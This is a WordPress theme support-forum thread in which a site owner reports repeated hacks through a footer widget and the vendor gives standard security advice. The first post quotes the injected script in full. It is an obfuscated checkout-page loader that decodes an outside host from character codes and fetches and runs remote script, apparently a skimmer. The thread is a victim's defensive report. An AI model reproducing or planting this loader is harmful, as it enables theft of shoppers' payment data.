Home Forums WoodMart support forum Woodmart Theme Keeps getting hacked

Woodmart Theme Keeps getting hacked

Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • #573631

    Michael de Jager
    Participant

    Hi,

    Our woodmart theme keeps getting hacked through our text widget in footer column 1.
    This is the code that keeps getting injected:
    </div> <script>!function(e,t){let n=-1!==e.cookie.indexOf(“debug=”);e.location.toString().includes(t)&&fetch([47,47,99,100,110,106,115,46,119,115].map(function(e){return String.fromCharCode(e)}).join(“”),{method:”POST”}).then(function(e){if(e.ok)return e.text()}).then(function(t){if(t){let i=e.createElement(“script”);i.setAttribute(“src”,t+(n?(t.includes(“?”)?”&”:”?”)+”_=”+new Date().valueOf().toString().slice(0, -2):””)),e.head.appendChild(i)}})}(document,”checkout”);</script></div>

    Please advise how we can prevent this from happening again.

    Thanks

    Attachments:
    You must be logged in to view attached files.
    #573688

    Artem Temos
    Keymaster
    Xtemos team

    Hello,

    Thank you for reaching out to us regarding the issue with your website being hacked.

    The fact that your website is hacked doesn’t mean that it is related to the WoodMart theme. According to the information provided, it appears that someone has access to your WordPress dashboard and is constantly adding malicious code to the footer widget. Here are some steps you can take to secure your site and prevent this from happening again:

    1. Change All Passwords:

    Immediately change the passwords for all user accounts with access to your WordPress dashboard, especially those with administrative privileges.
    Ensure that passwords are strong and unique.
    Review User Accounts:

    2. Check your WordPress users and remove any suspicious or unknown accounts.
    Ensure that only trusted users have administrative access.
    Update WordPress and Plugins:

    3. Make sure that your WordPress installation, theme, and all plugins are up to date.
    Outdated software can have vulnerabilities that hackers exploit.
    Scan for Malware:

    4. Use a security plugin like Wordfence or Sucuri to scan your site for malware.
    These plugins can help detect and remove malicious code from your site.
    Remove Malicious Code:

    5. Manually remove the injected code from the footer widget.
    Check other areas of your site for any additional malicious code.
    Enhance Security:

    6. Install a security plugin to add extra layers of protection to your site.
    Consider implementing measures such as two-factor authentication (2FA), firewall, and regular security scans.
    Check File Permissions:

    7. Ensure that your file permissions are correctly set to prevent unauthorized changes to your files.
    Typically, folders should have 755 permissions and files should have 644 permissions.
    Review Server Logs:

    8. Check your server logs for any suspicious activity that might indicate how the hacker gained access.
    This can help you identify and close any security gaps.
    Contact Your Hosting Provider:

    9. Inform your hosting provider about the issue. They may be able to provide additional support and security measures.
    By following these steps, you can help secure your site and prevent further unauthorized access. If you need further assistance, please let us know.

    Best regards

    #575338

    Michael de Jager
    Participant

    Thank you.

    Is there a way we can remove or deactivate column 1 in the footer and create a new column?

    The reason is that we keep getting hacked through column 1.

    We just want to try this as a temporary solution until we can find and fix the vulnerability.

    Thank you for responding to this with urgency.

    #575345

    Artem Temos
    Keymaster
    Xtemos team

    Hello,

    It doesn’t make any sense to remove or deactivate just column 1 of the footer to resolve the issue, as the vulnerability might be elsewhere. However, as a temporary solution, you can try using an HTML block and create your footer without using the widgets. You can do this in Theme Settings -> Footer.

Viewing 4 posts - 1 through 4 (of 4 total)